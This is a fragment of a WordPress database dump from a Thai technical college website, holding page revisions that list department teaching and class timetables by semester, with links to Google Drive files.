(2190, 4, '2018-05-06 21:38:55', '2018-05-06 14:38:55', '<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561<img class=\"alignnone size-full wp-image-2156\" src=\"/wp-content/uploads/2018/05/20100887_10061619190731.gif\" alt=\"\" width=\"28\" height=\"14\" /></span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางสอนช่างยนต์/เทคนิคเครื่องกล', '', 'inherit', 'closed', 'closed', '', '2189-revision-v1', '', '', '2018-05-06 21:38:55', '2018-05-06 14:38:55', '', 2189, 'http://www.technicrayong.ac.th/2189-revision-v1/', 0, 'revision', '', 0),
(2194, 4, '2018-05-06 21:40:57', '2018-05-06 14:40:57', '<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางสอนช่างยนต์/เทคนิคเครื่องกล', '', 'inherit', 'closed', 'closed', '', '2189-revision-v1', '', '', '2018-05-06 21:40:57', '2018-05-06 14:40:57', '', 2189, 'http://www.technicrayong.ac.th/2189-revision-v1/', 0, 'revision', '', 0),
(2195, 4, '2018-05-06 22:05:57', '2018-05-06 15:05:57', '<pre><strong><span style=\"color: #ff0000;\">ประเภทวิชาอุตสาหกรรม</span></strong></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C-%E0%B9%80%E0%B8%97%E0%B8%84%E0%B8%99%E0%B8%B4%E0%B8%84/\">แผนกวิชาช่างยนต์/เทคนิคเครื่องกล</a></p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาช่างกลโรงงาน/เทคนิคการผลิต</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาช่างเชื่อมโลหะ/เทคนิคโลหะ</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาช่างไฟฟ้ากำลัง</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาช่างอิเล็กทรอนิกส์</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาช่างก่อสร้าง</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาเครื่องมือวัดและควบคุม</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาปิโตรเคมี</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาเคมีอุตสาหกรรม</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาเทคโนโลยียาง</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาเทคนิคพื้นฐาน</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาบริหารธุรกิจ</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการบัญชี</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการตลาด/การจัดการธุรกิจค้าปลีก</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการเลขานุการ/การจัดการสำนักงาน</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการจัดการโลจิสติกส์</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาเทคโนโลยีสารสนเทศ</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาคหกรรม</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">แผนกวิชาคหกรรมศาสตร์</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาอาหารและโภชนาการ</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาอุตสาหกรรมท่องเที่ยว</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการท่องเที่ยว</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการโรงแรม</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\">ประเภทวิชาเทคโนโลยีสารสนเทศและการสื่อสาร</span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">สาขาวิชาเทคโนโลยีสารสนเทศ</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>แผนกวิชาสามัญสัมพันธ์</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">หมวดวิชาวิทยาศาสตร์</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาคณิตศาสตร์</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาภาษาอังกฤษ</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาสังคมศึกษา</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาภาษาไทย</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาพลานามัย</p>', 'ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-05-06 22:05:57', '2018-05-06 15:05:57', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(2197, 4, '2018-05-06 22:06:31', '2018-05-06 15:06:31', '<pre><strong><span style=\"color: #ff0000;\">ประเภทวิชาอุตสาหกรรม</span></strong></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C-%E0%B9%80%E0%B8%97%E0%B8%84%E0%B8%99%E0%B8%B4%E0%B8%84/\">แผนกวิชาช่างยนต์/เทคนิคเครื่องกล</a></p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาช่างกลโรงงาน/เทคนิคการผลิต</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาช่างเชื่อมโลหะ/เทคนิคโลหะ</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาช่างไฟฟ้ากำลัง</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาช่างอิเล็กทรอนิกส์</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาช่างก่อสร้าง</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาเครื่องมือวัดและควบคุม</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาปิโตรเคมี</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาเคมีอุตสาหกรรม</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาเทคโนโลยียาง</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาเทคนิคพื้นฐาน</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาบริหารธุรกิจ</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการบัญชี</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการตลาด/การจัดการธุรกิจค้าปลีก</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการเลขานุการ/การจัดการสำนักงาน</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการจัดการโลจิสติกส์</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาเทคโนโลยีสารสนเทศ</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาคหกรรม</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">แผนกวิชาคหกรรมศาสตร์</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาอาหารและโภชนาการ</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาอุตสาหกรรมท่องเที่ยว</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการท่องเที่ยว</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการโรงแรม</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\">ประเภทวิชาเทคโนโลยีสารสนเทศและการสื่อสาร</span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">สาขาวิชาเทคโนโลยีสารสนเทศ</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>แผนกวิชาสามัญสัมพันธ์</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">หมวดวิชาวิทยาศาสตร์</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาคณิตศาสตร์</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาภาษาอังกฤษ</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาสังคมศึกษา</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาภาษาไทย</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาพลานามัย</p>', 'ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-05-06 22:06:31', '2018-05-06 15:06:31', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(2210, 4, '2018-05-06 22:15:03', '2018-05-06 15:15:03', '<pre><strong><span style=\"color: #ff0000;\">ประเภทวิชาอุตสาหกรรม</span></strong></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C-%E0%B9%80%E0%B8%97%E0%B8%84%E0%B8%99%E0%B8%B4%E0%B8%84/\">แผนกวิชาช่างยนต์/เทคนิคเครื่องกล</a></p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาช่างกลโรงงาน/เทคนิคการผลิต</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาช่างเชื่อมโลหะ/เทคนิคโลหะ</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาช่างไฟฟ้ากำลัง</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาช่างอิเล็กทรอนิกส์</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาช่างก่อสร้าง</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาเครื่องมือวัดและควบคุม</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาปิโตรเคมี</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาเคมีอุตสาหกรรม</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาเทคโนโลยียาง</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาเทคนิคพื้นฐาน</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาบริหารธุรกิจ</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการบัญชี</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการตลาด/การจัดการธุรกิจค้าปลีก</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการเลขานุการ/การจัดการสำนักงาน</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการจัดการโลจิสติกส์</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาเทคโนโลยีสารสนเทศ</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาคหกรรม</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">แผนกวิชาคหกรรมศาสตร์</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาอาหารและโภชนาการ</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาอุตสาหกรรมท่องเที่ยว</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการท่องเที่ยว</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการโรงแรม</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\">ประเภทวิชาเทคโนโลยีสารสนเทศและการสื่อสาร</span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">สาขาวิชาเทคโนโลยีสารสนเทศ</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>แผนกวิชาสามัญสัมพันธ์</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">หมวดวิชาวิทยาศาสตร์</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาคณิตศาสตร์</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาภาษาอังกฤษ</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาสังคมศึกษา</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาภาษาไทย</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาพลานามัย</p>', 'ตารางเรียน-ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-05-06 22:15:03', '2018-05-06 15:15:03', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(2213, 4, '2018-05-06 22:17:56', '2018-05-06 15:17:56', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางช่างยนต์/เทคนิคเครื่องกล', '', 'inherit', 'closed', 'closed', '', '2189-revision-v1', '', '', '2018-05-06 22:17:56', '2018-05-06 15:17:56', '', 2189, 'http://www.technicrayong.ac.th/2189-revision-v1/', 0, 'revision', '', 0),
(2215, 4, '2018-05-06 22:18:46', '2018-05-06 15:18:46', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1I8IzCaFRbKs9qyITbQ1v29Qkafdtoyqr\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=19k1qJIBg00k5cI_rNSqI0w3BawkUjwEC\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<a href=\"https://drive.google.com/open?id=153ZA8T2PiptF8qHWSXMEyslhQK0DcRsW\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างกลโรงงาน/เทคนิคการผลิต', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%a5%e0%b9%82%e0%b8%a3%e0%b8%87', '', '', '2018-05-19 11:16:12', '2018-05-19 04:16:12', '', 0, 'http://www.technicrayong.ac.th/?page_id=2215', 0, 'page', '', 0),
(2216, 4, '2018-05-06 22:18:46', '2018-05-06 15:18:46', '', 'ตารางแผนกวิชาช่างกลโรงงาน/เทคนิคการผลิต', '', 'inherit', 'closed', 'closed', '', '2215-revision-v1', '', '', '2018-05-06 22:18:46', '2018-05-06 15:18:46', '', 2215, 'http://www.technicrayong.ac.th/2215-revision-v1/', 0, 'revision', '', 0),
(2219, 4, '2018-05-06 22:19:23', '2018-05-06 15:19:23', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างกลโรงงาน/เทคนิคการผลิต', '', 'inherit', 'closed', 'closed', '', '2215-revision-v1', '', '', '2018-05-06 22:19:23', '2018-05-06 15:19:23', '', 2215, 'http://www.technicrayong.ac.th/2215-revision-v1/', 0, 'revision', '', 0),
(2222, 4, '2018-05-06 22:21:24', '2018-05-06 15:21:24', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1T0pHa-7DaD8MgGMHkrCXBccgesDQ9lSQ\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1eddod67RH3QhKVcoO-Fv9rs0SbahG95M\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1ZADW8xErX7qgL7c2dSd3kUp3LarrOCgV\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างเชื่อมโลหะ/เทคนิคโลหะ', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad', '', '', '2018-05-15 04:39:07', '2018-05-14 21:39:07', '', 0, 'http://www.technicrayong.ac.th/?page_id=2222', 0, 'page', '', 0),
(2223, 4, '2018-05-06 22:21:24', '2018-05-06 15:21:24', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างเชื่อมโลหะ/เทคนิคโลหะ', '', 'inherit', 'closed', 'closed', '', '2222-revision-v1', '', '', '2018-05-06 22:21:24', '2018-05-06 15:21:24', '', 2222, 'http://www.technicrayong.ac.th/2222-revision-v1/', 0, 'revision', '', 0),
(2227, 4, '2018-05-06 22:24:18', '2018-05-06 15:24:18', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1V96vddqurFN3N4Hx3Lv0hWqud_sYGPZN\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1a_qPLEM63DK9oBLItdVKBKMMai_TWA__\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างไฟฟ้ากำลัง', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%84%e0%b8%9f%e0%b8%9f%e0%b9%89%e0%b8%b2', '', '', '2018-05-06 23:21:45', '2018-05-06 16:21:45', '', 0, 'http://www.technicrayong.ac.th/?page_id=2227', 0, 'page', '', 0),
(2228, 4, '2018-05-06 22:24:18', '2018-05-06 15:24:18', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างไฟฟ้ากำลัง', '', 'inherit', 'closed', 'closed', '', '2227-revision-v1', '', '', '2018-05-06 22:24:18', '2018-05-06 15:24:18', '', 2227, 'http://www.technicrayong.ac.th/2227-revision-v1/', 0, 'revision', '', 0),
(2231, 4, '2018-05-06 22:25:43', '2018-05-06 15:25:43', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1uiLC_aSepecWUM24PBRbwU1Tp_cQ6VSS\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=17bRalt-R4DwZhWe128GBHupz7KvZnCaZ\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1fcNLtBAulZ5JcgKfnCckUlpJWyRLYOrH\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างอิเล็กทรอนิกส์', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%ad%e0%b8%b4%e0%b9%80%e0%b8%a5%e0%b9%87', '', '', '2018-05-17 06:25:50', '2018-05-16 23:25:50', '', 0, 'http://www.technicrayong.ac.th/?page_id=2231', 0, 'page', '', 0),
(2232, 4, '2018-05-06 22:25:43', '2018-05-06 15:25:43', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างอิเล็กทรอนิกส์', '', 'inherit', 'closed', 'closed', '', '2231-revision-v1', '', '', '2018-05-06 22:25:43', '2018-05-06 15:25:43', '', 2231, 'http://www.technicrayong.ac.th/2231-revision-v1/', 0, 'revision', '', 0),
(2235, 4, '2018-05-06 22:27:37', '2018-05-06 15:27:37', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1OWe9N1wFXCKBcx6x059z2kJ3l-kcMmNU\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างก่อสร้าง', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b9%88%e0%b8%ad%e0%b8%aa%e0%b8%a3', '', '', '2018-05-15 04:43:15', '2018-05-14 21:43:15', '', 0, 'http://www.technicrayong.ac.th/?page_id=2235', 0, 'page', '', 0),
(2236, 4, '2018-05-06 22:27:37', '2018-05-06 15:27:37', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างก่อสร้าง', '', 'inherit', 'closed', 'closed', '', '2235-revision-v1', '', '', '2018-05-06 22:27:37', '2018-05-06 15:27:37', '', 2235, 'http://www.technicrayong.ac.th/2235-revision-v1/', 0, 'revision', '', 0),
